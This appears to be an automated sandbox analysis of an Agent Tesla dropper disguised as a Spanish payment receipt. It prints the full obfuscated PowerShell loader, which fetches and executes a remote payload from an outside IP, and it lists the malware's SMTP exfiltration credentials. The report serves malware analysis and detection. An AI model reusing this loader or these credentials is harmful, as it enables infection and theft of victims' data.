Analysis
-
max time kernel
140s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16/10/2024, 13:40
Static task
static1
Behavioral task
behavioral1
Sample
Justificante de pago.vbs
Resource
win7-20240903-en
General
-
Target
Justificante de pago.vbs
-
Size
14KB
-
MD5
2b8ac25e95bfd001ab3918830e3871c1
-
SHA1
a2d4688503ac088ac5773ee11e23478efd368c22
-
SHA256
10eeb719faf8e25b657be07a0d79e4d4d329adb11e61d63f7572fb03c21bdc62
-
SHA512
9f52e477f43170d50662b3c462eadb72ee3219ba835e352a45b4a851e08071c527feb30af206fe54b01bfa3a8c999ce462e05072aa091890d81707429d77eb38
-
SSDEEP
192:5Lmd4CdOuruUl1OgmEg5Rh7rMSTiuoXZ4caR/C3pQmkUOqiNESY8T1PHL:5yfzb1OTEg5Rh7rMMiXpAFCZeT1HL
Malware Config
Extracted
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
[email protected] - Password:
marcellinus360
Extracted
agenttesla
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
[email protected] - Password:
marcellinus360 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 5 IoCs
flow pid Process 4 4728 WScript.exe 8 4196 powershell.exe 33 1180 msiexec.exe 35 1180 msiexec.exe 45 1180 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 34 api.ipify.org 35 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1180 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1168 powershell.exe 1180 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4196 powershell.exe 4196 powershell.exe 1168 powershell.exe 1168 powershell.exe 1168 powershell.exe 1180 msiexec.exe 1180 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1168 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4196 powershell.exe Token: SeDebugPrivilege 1168 powershell.exe Token: SeDebugPrivilege 1180 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1180 msiexec.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4728 wrote to memory of 4196 4728 WScript.exe 84 PID 4728 wrote to memory of 4196 4728 WScript.exe 84 PID 1168 wrote to memory of 1180 1168 powershell.exe 98 PID 1168 wrote to memory of 1180 1168 powershell.exe 98 PID 1168 wrote to memory of 1180 1168 powershell.exe 98 PID 1168 wrote to memory of 1180 1168 powershell.exe 98
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Justificante de pago.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bahraineren Tilkrslens Geyserish Ornitologien #>;$Hemichordatenformationssamfund='Abdiceringer';<#Trvlemunden Anskueligt Forgifter Tillgge #>;$Precurricular18=$Unjapanned+$host.UI;function Adventurish($Antipedal){If ($Precurricular18) {$Bornane++;}$Charras=$excarnation+$Antipedal.'Length'-$Bornane; for( $Hemichordate=4;$Hemichordate -lt $Charras;$Hemichordate+=5){$Misguage++;$Vverknob+=$Antipedal[$Hemichordate];$Deistiske='Uninstitutional';}$Vverknob;}function Fradrages($Merchantability){ . ($aagers) ($Merchantability);}$Taxgatherer=Adventurish ' MedMFrlio scrz isiPupalRemol K laCaph/ In, ';$Taxgatherer+=Adventurish 'Over5Citr.Uorg0 San Via( B nW LaaiUnsenSubndRattoDybdwhidsse et ehuNGestT F.i C,ot1 L n0Bism. For0Beri;Lage UnsW AntiG,inn .ub6Anti4Over; Di Undex Non6Netl4Bary; Nik QuinrSa bvStea: I n1Reli3Fror1trop.Vold0 Exu) Skr almGSlureSnigc Insk ansoDrej/Val.2Th r0Opt,1Over0lon 0 B r1F.rs0 Uds1spge AnneFVchoi,verrTogreAnkefAli oRap.xp,as/Ba e1 Ell3reba1Phyc.Dri.0Undt ';$Neuroglia=Adventurish 'ThamU StjSPaireToryRO ea-Pa tA A uGF,gtEchirN,askTRadi ';$Outwish=Adventurish 'K.tahT.lvtHenvtUnsepIndm:.upl/Unwe/ Non1plet0Skot1Al a. Sk.9B,le9Uend. etu9Ke l4Th l. pla1Gave9St r5Peri/Svr,GM alaLemplklemlAsbeoTabltKlunaSampn Irrnwe,liShircDres.EarhfkunslPub.aD.mo ';$Makeress=Adventurish 'nons> Ta ';$aagers=Adventurish 'S.orI howEBensx Uky ';$Anemometres='Commentates';$drikkes='\Sussex.Kal';Fradrages (Adventurish ' ns$S,gmgSlaglDoesoPro BtangA .vaLNonc:abanpZooth KlayLevelTekslSamfaFjerm DueO V.rR orkPPoinhimpe= Bag$s.veE DirNSweeVOpst:Kbeba Mv.p fteP neudramia ildtLemba.aro+Talo$Pixid VarRLgenISpidkCardkStepeIns,s Non ');Fradrages (Adventurish ' Pre$a stGVa,uLlusto TilB BouASc,nL Dat:Anskg Sorr,mgnaK.afTL viu La lHexaELeucR Th.eFrasnKersDskejE ixi= kra$C.rtOoceaUM tctfodewPasfiqu nsSteah fag.PurpsSrgepElekl uriMicrTKi o(Thes$SydaM G ua SumkChroeTokirEsteeEddisBre,SJena) kll ');Fradrages (Adventurish ' ly[GravNperleAlmitMaia.Sto.s KolEMumirA glVMagnIImbocMagneWangp AlooTorniMarsN UtnT.irkm PalABestn NutAUncrG uddeRennrSu.o]Udkr: Pse:TreeS erie.fveCEst u Dy R E.aITinnT U.fyTamdP StuRScriOFiretT,lcOsoldc Ge O zygLInfl Arv=Leon Inte[Didon BicENotetPrec.St,nSUndreWea cKanaUEkstRUnauISvmmT PkoyAffaP BogRAntiOKerntR ciO.ystcRegnoErodLstonTFo.sy UndpUnthE His]Broh:F rm:.krkTB.jaL tatS Noe1Penu2Euch ');$Outwish=$Gratulerende[0];$motocrossbanes=(Adventurish 'A ph$SkrdGRen l ,erOPelob eada kvalB ug: BenFLapsd R,ksHv dERathlSemiS Ud,DSne aHy.dG,igsEPfftnU vae QuasLgea=ConsNUn hEUparW,our-H.veOU cobOpsej a,geReinc atiTKann olesAgnoySpers FulT ekkETukuMPeas. onsnBoole ubaT tem.HomowAbl eLggebBerac Fe LPolei Pa eStrinDiktTDua ');Fradrages ($motocrossbanes);Fradrages (Adventurish 'Var $ nfF Spad pbsF ese vejlSid.sAngidOvera eskgFamieHavan aqueAfp.sQuin. Id.HForeeFavoaBr ddArgieUkalrTrubsHach[Sp k$StabN De,e Kamu ecarhundoDe.ag IsclJ.bii suraFumi].ove= Vre$FistTPhthaUlvsxHerrgC.oraove t Burh PareIrrur R.pe,avirLibr ');$Unegregious=Adventurish 'S is$StedFsquid SacsNonveUparlBalksAabedVi,daAr egA taeLandn.role ands.tat. CluDUnknoOr.iwMelinParalVi to HjpaSpnddPo oFOrchi quilCribe Vas( Out$LakkOmodsuIsoptSundw ReciCuddsAa dhUsag,Ka,e$TranpPhoto aillBou,iSebio Ac v NynaDokucTel cGeneiLevenFi keCo k) In ';$poliovaccine=$Phyllamorph;Fradrages (Adventurish 'Udst$CanogRelulT foo .aib bu aRamilFeu : BraADiecL Q al R vI GoaeInte= ige(MesoTLivsEXa ts StaTSkil-Ta,epHa,baCampt LanhSapo Win$ reppCi,ro TralHypoIMarkoM nuVBrokAAmorcDemecL,triListnTe rE,kun)R sp ');while (!$Allie) {Fradrages (Adventurish 'kv.l$B,negsto,lSmruoPekibNihia BeblB.ad:MammGPermr,ppro ostuoprrnCu.ddMetamdksma K lsEftesOede=Ma.m$ Cont .olrAtmouArmoeA,si ') ;Fradrages $Unegregious;Fradrages (Adventurish 'Rec.SPha tEc,laMajernitcTShif-OverSrentlC,nvE.dacEAngrPSpri M tr4Over ');Fradrages (Adventurish 'Intr$ odegOmfalSharOHjembM llaRisiLBatt:SedaAAgriL torl KurIPerfE ski=Auto(merkT FnbeNo rs unmtTril-PreiPAphtalgehtTr.gHMa a Tea$CalcPCranoVoxtlPetaI lysO.orsv Br ApropCSny c raci himNErgaeSpnd)Blaa ') ;Fradrages (Adventurish ' Unl$AnthgFisklF lio PrabphytATy.alTimo:B evURestnS gebL ttAOv rrVej tRecee na R korIUdstnCancgenek4 Pne=Baye$FodegBuddlMangO .nsBE,stA ,ubLsupe:TidsSArroPUnbohInfriSgsmNUbe GO,roo weasBunkiI foNUmag+ P x+ Rst%Ans.$KredGDrifRExciaDrentDilaUpuppl ygeAf vRSupeePincn NonDresieFlde.Ear CSuspO EvaUAflsn IntT sa ') ;$Outwish=$Gratulerende[$Unbartering4];}$hyperdiabolically=319830;$Engager=28986;Fradrages (Adventurish 'hunk$AfplgResuLOpvaOSelvBOplgalyreLSafi:hardCSem.R btrI .ktNF,nkiStraG ReiEU,lnRKlneO rafuemerSDogm1Unbl5 Yow4 tet Ka a=Mid dapGKldnEBambT ps- Sonc Sy oS utnundeThenfe Ap nJgert Gr. Midd$ B gP YdeOTranLGr,lIUnbeoR,roV Syna AancprolCwa di SolNStanEPriv ');Fradrages (Adventurish 'Fosf$Fod.gProgl HavoFlotbS.opaKololT kt:exciTJobsaHierd ShaiSk noDefo1 le0Blin1,acc Unde=Pr t Bris[slynSS oryPorpsNon.tSw tecamimmodu.Am rC ioloB drnTidsvR gneNskerP ritA,pr] Sat: Smi: onFFlorr reaoThy,mCollBPachaFr lsLusoe Hju6Tomm4ProaS StitPas.rRan,iUn,enPoingA ro(Word$Un.hCCa.lrZoneiU consun.imaddg ifte AfhrArrioResguGennsPo,e1 Ans5U.de4 P n)A gu ');Fradrages (Adventurish 'A,te$T.elGFor LRevao veBBussa IrkL,lav:P trh TraaRentlOddvS,armBPr,jAB sia axn Ab d aph1Ret 1Wade7 Hem umm=Per, K,og[ForeSRigsY,lusSBetrtKnbueOpleMRepr.Kampt St eSevaxSalmtProk. idie H.mN estCEntyo sylDhaa IUnv.nbespGSp i]Cals:Ulov: ranaVelksLus cGenaIX.ini God. eraGStude Drit GymS eroT arrWallIGainnAconG gui(Ison$VizatCol aFratdu.cliSvino,nfa1A bl0somm1Micr)Flag ');Fradrages (Adventurish 'Sign$Udo G .eslCodeO TheB.aliaBiskLAkin:DilaCBassOAlleM ispDunaA pidCBa tt .ocdVelsIHy.oSSyntK Ins=Depl$ onhRelaaKom,LOversKateBKab A dgiAExtrNCareDCopi1Cel.1Gl,c7tdl .Lovks Du.u,virbFro sHypot .uar NonIAarsnOv,rGFl s(outg$ P cHRe.tY DriPGirse SalrmeliDDeikISprga orBSlrso UnlLBestIOverc nmaProdl SmrLM xeYWilb,Emis$BeslE AchNLanggBescAIbicgKyllEIncorPla ) Bek ');Fradrages $Compactdisk;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4196
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Bahraineren Tilkrslens Geyserish Ornitologien #>;$Hemichordatenformationssamfund='Abdiceringer';<#Trvlemunden Anskueligt Forgifter Tillgge #>;$Precurricular18=$Unjapanned+$host.UI;function Adventurish($Antipedal){If ($Precurricular18) {$Bornane++;}$Charras=$excarnation+$Antipedal.'Length'-$Bornane; for( $Hemichordate=4;$Hemichordate -lt $Charras;$Hemichordate+=5){$Misguage++;$Vverknob+=$Antipedal[$Hemichordate];$Deistiske='Uninstitutional';}$Vverknob;}function Fradrages($Merchantability){ . ($aagers) ($Merchantability);}$Taxgatherer=Adventurish ' MedMFrlio scrz isiPupalRemol K laCaph/ In, ';$Taxgatherer+=Adventurish 'Over5Citr.Uorg0 San Via( B nW LaaiUnsenSubndRattoDybdwhidsse et ehuNGestT F.i C,ot1 L n0Bism. For0Beri;Lage UnsW AntiG,inn .ub6Anti4Over; Di Undex Non6Netl4Bary; Nik QuinrSa bvStea: I n1Reli3Fror1trop.Vold0 Exu) Skr almGSlureSnigc Insk ansoDrej/Val.2Th r0Opt,1Over0lon 0 B r1F.rs0 Uds1spge AnneFVchoi,verrTogreAnkefAli oRap.xp,as/Ba e1 Ell3reba1Phyc.Dri.0Undt ';$Neuroglia=Adventurish 'ThamU StjSPaireToryRO ea-Pa tA A uGF,gtEchirN,askTRadi ';$Outwish=Adventurish 'K.tahT.lvtHenvtUnsepIndm:.upl/Unwe/ Non1plet0Skot1Al a. Sk.9B,le9Uend. etu9Ke l4Th l. pla1Gave9St r5Peri/Svr,GM alaLemplklemlAsbeoTabltKlunaSampn Irrnwe,liShircDres.EarhfkunslPub.aD.mo ';$Makeress=Adventurish 'nons> Ta ';$aagers=Adventurish 'S.orI howEBensx Uky ';$Anemometres='Commentates';$drikkes='\Sussex.Kal';Fradrages (Adventurish ' ns$S,gmgSlaglDoesoPro BtangA .vaLNonc:abanpZooth KlayLevelTekslSamfaFjerm DueO V.rR orkPPoinhimpe= Bag$s.veE DirNSweeVOpst:Kbeba Mv.p fteP neudramia ildtLemba.aro+Talo$Pixid VarRLgenISpidkCardkStepeIns,s Non ');Fradrages (Adventurish ' Pre$a stGVa,uLlusto TilB BouASc,nL Dat:Anskg Sorr,mgnaK.afTL viu La lHexaELeucR Th.eFrasnKersDskejE ixi= kra$C.rtOoceaUM tctfodewPasfiqu nsSteah fag.PurpsSrgepElekl uriMicrTKi o(Thes$SydaM G ua SumkChroeTokirEsteeEddisBre,SJena) kll ');Fradrages (Adventurish ' ly[GravNperleAlmitMaia.Sto.s KolEMumirA glVMagnIImbocMagneWangp AlooTorniMarsN UtnT.irkm PalABestn NutAUncrG uddeRennrSu.o]Udkr: Pse:TreeS erie.fveCEst u Dy R E.aITinnT U.fyTamdP StuRScriOFiretT,lcOsoldc Ge O zygLInfl Arv=Leon Inte[Didon BicENotetPrec.St,nSUndreWea cKanaUEkstRUnauISvmmT PkoyAffaP BogRAntiOKerntR ciO.ystcRegnoErodLstonTFo.sy UndpUnthE His]Broh:F rm:.krkTB.jaL tatS Noe1Penu2Euch ');$Outwish=$Gratulerende[0];$motocrossbanes=(Adventurish 'A ph$SkrdGRen l ,erOPelob eada kvalB ug: BenFLapsd R,ksHv dERathlSemiS Ud,DSne aHy.dG,igsEPfftnU vae QuasLgea=ConsNUn hEUparW,our-H.veOU cobOpsej a,geReinc atiTKann olesAgnoySpers FulT ekkETukuMPeas. onsnBoole ubaT tem.HomowAbl eLggebBerac Fe LPolei Pa eStrinDiktTDua ');Fradrages ($motocrossbanes);Fradrages (Adventurish 'Var $ nfF Spad pbsF ese vejlSid.sAngidOvera eskgFamieHavan aqueAfp.sQuin. Id.HForeeFavoaBr ddArgieUkalrTrubsHach[Sp k$StabN De,e Kamu ecarhundoDe.ag IsclJ.bii suraFumi].ove= Vre$FistTPhthaUlvsxHerrgC.oraove t Burh PareIrrur R.pe,avirLibr ');$Unegregious=Adventurish 'S is$StedFsquid SacsNonveUparlBalksAabedVi,daAr egA taeLandn.role ands.tat. CluDUnknoOr.iwMelinParalVi to HjpaSpnddPo oFOrchi quilCribe Vas( Out$LakkOmodsuIsoptSundw ReciCuddsAa dhUsag,Ka,e$TranpPhoto aillBou,iSebio Ac v NynaDokucTel cGeneiLevenFi keCo k) In ';$poliovaccine=$Phyllamorph;Fradrages (Adventurish 'Udst$CanogRelulT foo .aib bu aRamilFeu : BraADiecL Q al R vI GoaeInte= ige(MesoTLivsEXa ts StaTSkil-Ta,epHa,baCampt LanhSapo Win$ reppCi,ro TralHypoIMarkoM nuVBrokAAmorcDemecL,triListnTe rE,kun)R sp ');while (!$Allie) {Fradrages (Adventurish 'kv.l$B,negsto,lSmruoPekibNihia BeblB.ad:MammGPermr,ppro ostuoprrnCu.ddMetamdksma K lsEftesOede=Ma.m$ Cont .olrAtmouArmoeA,si ') ;Fradrages $Unegregious;Fradrages (Adventurish 'Rec.SPha tEc,laMajernitcTShif-OverSrentlC,nvE.dacEAngrPSpri M tr4Over ');Fradrages (Adventurish 'Intr$ odegOmfalSharOHjembM llaRisiLBatt:SedaAAgriL torl KurIPerfE ski=Auto(merkT FnbeNo rs unmtTril-PreiPAphtalgehtTr.gHMa a Tea$CalcPCranoVoxtlPetaI lysO.orsv Br ApropCSny c raci himNErgaeSpnd)Blaa ') ;Fradrages (Adventurish ' Unl$AnthgFisklF lio PrabphytATy.alTimo:B evURestnS gebL ttAOv rrVej tRecee na R korIUdstnCancgenek4 Pne=Baye$FodegBuddlMangO .nsBE,stA ,ubLsupe:TidsSArroPUnbohInfriSgsmNUbe GO,roo weasBunkiI foNUmag+ P x+ Rst%Ans.$KredGDrifRExciaDrentDilaUpuppl ygeAf vRSupeePincn NonDresieFlde.Ear CSuspO EvaUAflsn IntT sa ') ;$Outwish=$Gratulerende[$Unbartering4];}$hyperdiabolically=319830;$Engager=28986;Fradrages (Adventurish 'hunk$AfplgResuLOpvaOSelvBOplgalyreLSafi:hardCSem.R btrI .ktNF,nkiStraG ReiEU,lnRKlneO rafuemerSDogm1Unbl5 Yow4 tet Ka a=Mid dapGKldnEBambT ps- Sonc Sy oS utnundeThenfe Ap nJgert Gr. Midd$ B gP YdeOTranLGr,lIUnbeoR,roV Syna AancprolCwa di SolNStanEPriv ');Fradrages (Adventurish 'Fosf$Fod.gProgl HavoFlotbS.opaKololT kt:exciTJobsaHierd ShaiSk noDefo1 le0Blin1,acc Unde=Pr t Bris[slynSS oryPorpsNon.tSw tecamimmodu.Am rC ioloB drnTidsvR gneNskerP ritA,pr] Sat: Smi: onFFlorr reaoThy,mCollBPachaFr lsLusoe Hju6Tomm4ProaS StitPas.rRan,iUn,enPoingA ro(Word$Un.hCCa.lrZoneiU consun.imaddg ifte AfhrArrioResguGennsPo,e1 Ans5U.de4 P n)A gu ');Fradrages (Adventurish 'A,te$T.elGFor LRevao veBBussa IrkL,lav:P trh TraaRentlOddvS,armBPr,jAB sia axn Ab d aph1Ret 1Wade7 Hem umm=Per, K,og[ForeSRigsY,lusSBetrtKnbueOpleMRepr.Kampt St eSevaxSalmtProk. idie H.mN estCEntyo sylDhaa IUnv.nbespGSp i]Cals:Ulov: ranaVelksLus cGenaIX.ini God. eraGStude Drit GymS eroT arrWallIGainnAconG gui(Ison$VizatCol aFratdu.cliSvino,nfa1A bl0somm1Micr)Flag ');Fradrages (Adventurish 'Sign$Udo G .eslCodeO TheB.aliaBiskLAkin:DilaCBassOAlleM ispDunaA pidCBa tt .ocdVelsIHy.oSSyntK Ins=Depl$ onhRelaaKom,LOversKateBKab A dgiAExtrNCareDCopi1Cel.1Gl,c7tdl .Lovks Du.u,virbFro sHypot .uar NonIAarsnOv,rGFl s(outg$ P cHRe.tY DriPGirse SalrmeliDDeikISprga orBSlrso UnlLBestIOverc nmaProdl SmrLM xeYWilb,Emis$BeslE AchNLanggBescAIbicgKyllEIncorPla ) Bek ');Fradrages $Compactdisk;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1180
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
454KB
MD500e8d1821c2a0d163ad4c3a0012a3f62
SHA1dbd147d7b63e3e920d0b60e74e2f96dedff7c15a
SHA2566ce67207dfb8cc4d3986d916c97d2d385f8a36c79db0a6d40caac0c3979bd3b6
SHA512e8908fc8178da125fbe59893348ab096f21b1838b87df0dce3da506f4f7f82fb30ef54425049f55ea1822aa1a10b0d6be8be9b065d1c614553558ab841f6052f